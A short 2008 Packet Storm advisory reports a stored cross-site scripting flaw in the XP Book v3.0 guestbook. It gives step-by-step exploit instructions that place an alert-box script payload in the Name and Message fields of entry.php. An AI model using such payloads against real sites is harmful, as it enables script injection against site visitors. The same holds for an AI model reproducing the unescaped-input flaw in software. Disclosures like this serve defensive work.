xpbook-xss.txt

2008-03-03T00:00:00
ID PACKETSTORM:64206
Type packetstorm
Reporter Linux_Drox
Modified 2008-03-03T00:00:00

Description

                                        
                                            `Hello ,   
  
I haven't send any new bugs for long time :)  
  
Vulnerable : XP Book v3.0  
coded by http://kuwaitiphp.alruban.net   
* i think their website doesn't work at the moment   
  
exploit :  
open http://www.example.com/xpbook/entry.php  
  
then type in   
Name:  
'><script>alert(xss);</script>  
Email :   
whatever@whatever.com  
  
Message :  
'><script>alert(xss);</script>  
  
then press Send ! and the code that we typed is going to work !  
  
discovered by / Linux_Drox  
www.LeZr.Com  
  
Best regards ,  
  
  
`